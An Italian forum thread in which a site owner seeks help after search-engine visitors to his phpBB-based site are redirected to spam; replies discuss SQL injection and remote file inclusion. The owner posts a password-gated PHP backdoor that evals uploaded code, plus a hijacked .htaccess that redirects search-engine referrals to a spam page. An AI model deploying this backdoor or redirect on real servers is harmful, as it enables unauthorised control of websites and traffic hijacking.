- Home
- Categorie
- Gaming, Hardware e Software
- Sicurezza Informatica & Privacy
- Attacco hacker?
-
Attacco hacker?
Salve,
dall'inizio della settimana avevo notato un tracollo negli accessi al mio sito.
Ho provato a fare un controllo e sono rimasto sconcertato.
Digito una qualsiasi chiave di ricerca per la quale sono ben posizionato.
Clicco sul link al mio sito e..
Invece di apparire la home page, mi appare una pagina nera (tipo blog) con link a siti spam.
E' mai successo a nessuno una cosa del genere? Cosa posso fare?
-
Sposto la discussione in Sicurezza Informatica per ora
-
Niente. In poche parole sei stato vittima di un deface. Chiama immediatamente la tua ditta di hosting e informali. Che tecnologia c'era sul sito ? php ? asp ? Qualche cms ? forum phpBB ?
EDIT: ah, per inciso, non si tratta di hackers. Ma di Lamers/ScriptKiddies/Wannabe.
-
la tecnologia è php, hanno modificato l'htaccess della root (e questo mi fa tremare le gambe) inserendo un htaccess fasullo a vista (che inrealtà dovrebbe essere nascosto) ed inserito due cartelle in una cartella interna
-
io li chiamerei cracker piu che lamer
-
Tipicamente quali vulnerabilità vengono sfruttate per questo tipo di crack?
Ho controllato tutto e non riesco a trovare la vulnerabilità che ogni giorno sfruttano!
-
Tante. Spesso sono attacchi basati su php, sql-injection. Quasi mai sono attacchi a livello demone ( Apache, IIS...) e molto piu facili da implementare rispetto a quest'ultimi.
-
Non è sql-injection poiché il db è integro. Hano creato molti file php e modificato htaccess. Cosa potrei controllare? Ho un modulo che consente l'upload di immagini, ho bloccato tutti i file non jpg..
-
nedone se ti va posso dare un occhiata io...
comunque se uno usa una sql injection non centra se il db e' integro...hanno solo attaccato tramite sql injection e hanno recuperato la tua password criptata in MD5 ...l'hanno crackata e spesso e' uguale a quella dell'FTP...se l'admin e' ingenuo...
Oppure un altro tipo di attacco che secondo me al 99% hanno usato e' il remote file inclusion...ovvero sfruttando un include(); hanno preso controllo del tuo sito creando file e backdoor a loro piacere...
Contattami in pvt se ti va di "ingaggiarmi"...potrei trovare e fixare il bug.
O se vuoi fare da te,controlla tutte le variabili che $_GET non sia tramite include..
Esempio:$variabile = $_GET['variabile'];
include($variabile);Vedi tu...
-
Ti ho mandato un messaggio in pvt. Cmq le password sono molto diverse. Sul sito è installata una versione molto modificata di phpbb, sarebbe ostico effettuare un controllo di tutte le variabili...
-
ricevuto
-
Ciao nedone,
@nedone said:
....Sul sito è installata una versione molto modificata di phpbb.....
versione di phpbb?
-
Non saprei, anche perché l'ho modificata pesantemente, cmq dovrebbe essere la 2.0.21
-
-
Lo so, ma ormai con tutte le modifiche che ho apportato è inaggiornabile...
-
massi' tanto la 2.0.21 ha solo un Cross site scripting in privmsg.php e un altro Cross site request forgery...roba da "nulla"...
al massimo cambia quel file con quello della 2.0.23...e potresti cambiare anche gli altri,stando attento a non eliminare le tue modifiche...
nedone correggi quell'include che ti ho fatto vedere e in teoria sei a posto...
-
Quello che mi hai fatto vedere non è una include! In pratica non ne uso di include!
Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare? Secondo voi hanno il controllo dell'ftp? Cambio la pwd?
-
@nedone said:
Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare?
Ciao nedone,
posta pure l'indirizzo del tuo sito, "magari in pvt"!
@nedone said:
Cambio la pwd?
-
il sito è delmutolo.com
-
Potete aiutarmi a capire l'intento di questo script che ho trovato occultato nelle mie cartelle?
<?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"])){ eval($code); } else{ testdata('f'); }; } else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?> ```Credo di aver capito cosa fa, ma non riesco a capire il perché lo fa. Mi rimane oscura la comprensione del funzionamento che c'è alle spalle. A questo va associato il file .htaccess che viene modificato così:
RewriteEngine on
a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http:([a-z0-9_-]+.)(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24).
RewriteCond %{HTTP_REFERER}?&=
RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.$ /images/ekukure/ex3/t.htma995d2cc661fa72452472e9554b5520c
RewriteRule foto-(.*).html gallery.php?dir=$1